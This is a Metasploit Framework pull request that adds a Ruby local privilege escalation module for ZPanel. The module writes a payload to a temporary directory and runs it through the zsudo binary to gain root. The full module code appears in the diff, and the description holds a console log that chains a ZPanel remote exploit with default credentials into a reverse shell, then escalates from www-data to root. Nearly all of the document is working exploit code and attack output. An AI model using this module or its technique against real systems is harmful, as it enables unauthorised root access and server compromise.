### PR TITLE
Add local privilege escalation for ZPanel zsudo abuse

### DIFF
--- a/modules/exploits/linux/local/zpanel_zsudo.rb
+++ b/modules/exploits/linux/local/zpanel_zsudo.rb
@@ -62,12 +62,12 @@ class Metasploit4 < Msf::Exploit::Local
 
 	def exploit
 		if (target.arch.include? ARCH_CMD)
-			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.sh"
+			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.sh"
 			# Using this way of writing the payload to avoid issues when failing to find
 			# a command on the victim for writing binary data
 			cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}"
 		else
-			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.elf"
+			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(3 + rand(5))}.elf"
 			write_file(exe_file, generate_payload_exe)
 		end
 
@@ -76,7 +76,7 @@ class Metasploit4 < Msf::Exploit::Local
 		print_status("Running...")
 
 		begin
-			cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(8)}"
+			cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(3 + rand(5))}"
 		ensure
 			cmd_exec "rm -f #{exe_file}"
 		end

--- a/modules/exploits/linux/local/zpanel_zsudo.rb
+++ b/modules/exploits/linux/local/zpanel_zsudo.rb
@@ -1,0 +1,86 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+#   http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+require 'msf/core/post/common'
+require 'msf/core/post/file'
+require 'msf/core/post/linux/priv'
+require 'msf/core/exploit/exe'
+
+
+class Metasploit4 < Msf::Exploit::Local
+	Rank = ExcellentRanking
+
+	include Msf::Exploit::EXE
+	include Msf::Post::File
+	include Msf::Post::Common
+
+	def initialize(info={})
+		super( update_info( info, {
+				'Name'          => 'ZPanel zsudo Local Privilege Escalation Exploit',
+				'Description'   => %q{
+					This module abuses the zsudo binary, installed with zpanel, to escalate
+					privileges. In order to work, a session with access to zsudo on the sudoers
+					configuration is needed. This module is useful for post exploitation of ZPanel
+					vulnerabilities, where typically web server privileges are acquired, and this
+					user is allowed to execute zsudo on the sudoers file.
+				},
+				'License'       => MSF_LICENSE,
+				'Author'        => [ 'sinn3r', 'juan vazquez' ],
+				'DisclosureDate' => 'Jun 07 2013',
+				'Platform'      => [ 'unix', 'linux'],
+				'Arch'          => [ ARCH_CMD, ARCH_X86 ],
+				'SessionTypes'  => [ 'shell', 'meterpreter' ],
+				'Targets'       =>
+					[
+						[ 'Command payload', { 'Arch' => ARCH_CMD } ],
+						[ 'Linux x86',       { 'Arch' => ARCH_X86 } ]
+					],
+				'DefaultOptions' => { "PrependSetresuid" => true, "WfsDelay" => 2 },
+				'DefaultTarget' => 0,
+			}
+			))
+		register_options([
+				# These are not OptPath becuase it's a *remote* path
+				OptString.new("WritableDir", [ true, "A directory where we can write files", "/tmp" ]),
+				OptString.new("zsudo",        [ true, "Path to zsudo executable", "/etc/zpanel/panel/bin/zsudo" ]),
+			], self.class)
+	end
+
+	def check
+		if file?(datastore["zsudo"])
+			return CheckCode::Detected
+		end
+
+		return CheckCode::Unknown
+	end
+
+	def exploit
+		if (target.arch.include? ARCH_CMD)
+			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.sh"
+			# Using this way of writing the payload to avoid issues when failing to find
+			# a command on the victim for writing binary data
+			cmd_exec "echo \"#{payload.encoded.gsub(/"/, "\\\"")}\" > #{exe_file}"
+		else
+			exe_file = "#{datastore["WritableDir"]}/#{rand_text_alpha(8)}.elf"
+			write_file(exe_file, generate_payload_exe)
+		end
+
+		cmd_exec "chmod +x #{exe_file}"
+
+		print_status("Running...")
+
+		begin
+			cmd_exec "#{datastore["zsudo"]} #{exe_file} #{rand_text_alpha(8)}"
+		ensure
+			cmd_exec "rm -f #{exe_file}"
+		end
+
+	end
+end
+


### PR DESCRIPTION
This pull requests tries to complete the exploit for zpanel added with #2005 , in this way is possible to escalate until root if zsudo is correctly configured and enabled for the webserver user.

Test (getting an unprivileged session with the zpanel remote exploit, and escalating to root via the local exploit):

```
msf > use exploit/unix/webapp/zpanel_username_exec 
msf exploit(zpanel_username_exec) > set USERNAME zadmin
USERNAME => zadmin
msf exploit(zpanel_username_exec) > set PASSWORD password
PASSWORD => password
msf exploit(zpanel_username_exec) > set RHOST 192.168.172.249
RHOST => 192.168.172.249
msf exploit(zpanel_username_exec) > exploit

[*] Started reverse double handler
[+] 192.168.172.249:80 - Logged in as 'zadmin:password'
[*] 192.168.172.249:80 - Executing payload...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo wcpzOKEercueSXEP;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "wcpzOKEercueSXEP\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.172.1:4444 -> 192.168.172.249:54788) at 2013-06-23 10:59:00 -0500

id
uid=33(www-data) gid=33(www-data) groups=33(www-data),2001(ftpgroup)
z^Z
Background session 1? [y/N]  y
[-] Session manipulation failed: Invalid argument ["/Users/juan/Projects/metasploit-framework/lib/rex/sync/thread_safe.rb:36:in `select'", "/Users/juan/Projects/metasploit-framework/lib/rex/sync/thread_safe.rb:36:in `select'", "/Users/juan/Projects/metasploit-framework/lib/msf/base/sessions/command_shell.rb:302:in `_interact_ring'", "/Users/juan/Projects/metasploit-framework/lib/msf/base/sessions/command_shell.rb:249:in `_interact'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/interactive.rb:49:in `interact'", "/Users/juan/Projects/metasploit-framework/lib/msf/ui/console/command_dispatcher/core.rb:1707:in `cmd_sessions'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'", "/Users/juan/Projects/metasploit-framework/lib/msf/ui/console/command_dispatcher/exploit.rb:142:in `cmd_exploit'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:427:in `run_command'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:389:in `block in run_single'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `each'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/dispatcher_shell.rb:383:in `run_single'", "/Users/juan/Projects/metasploit-framework/lib/rex/ui/text/shell.rb:200:in `run'", "./msfconsole:169:in `<main>'"]
msf exploit(zpanel_username_exec) > use exploit/linux/local/zpanel_zsudo 
msf exploit(zpanel_zsudo) > set session 1
session => 1
msf exploit(zpanel_zsudo) > check
[*] The target service is running, but could not be validated.
msf exploit(zpanel_zsudo) > exploit

[*] Started reverse double handler
[*] Running...
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo gLXQAtYUAty2C3Z6;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "gLXQAtYUAty2C3Z6\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 2 opened (192.168.0.4:4444 -> 192.168.0.4:53083) at 2013-06-23 10:59:24 -0500

id
uid=0(root) gid=33(www-data) groups=0(root)
^Z

```
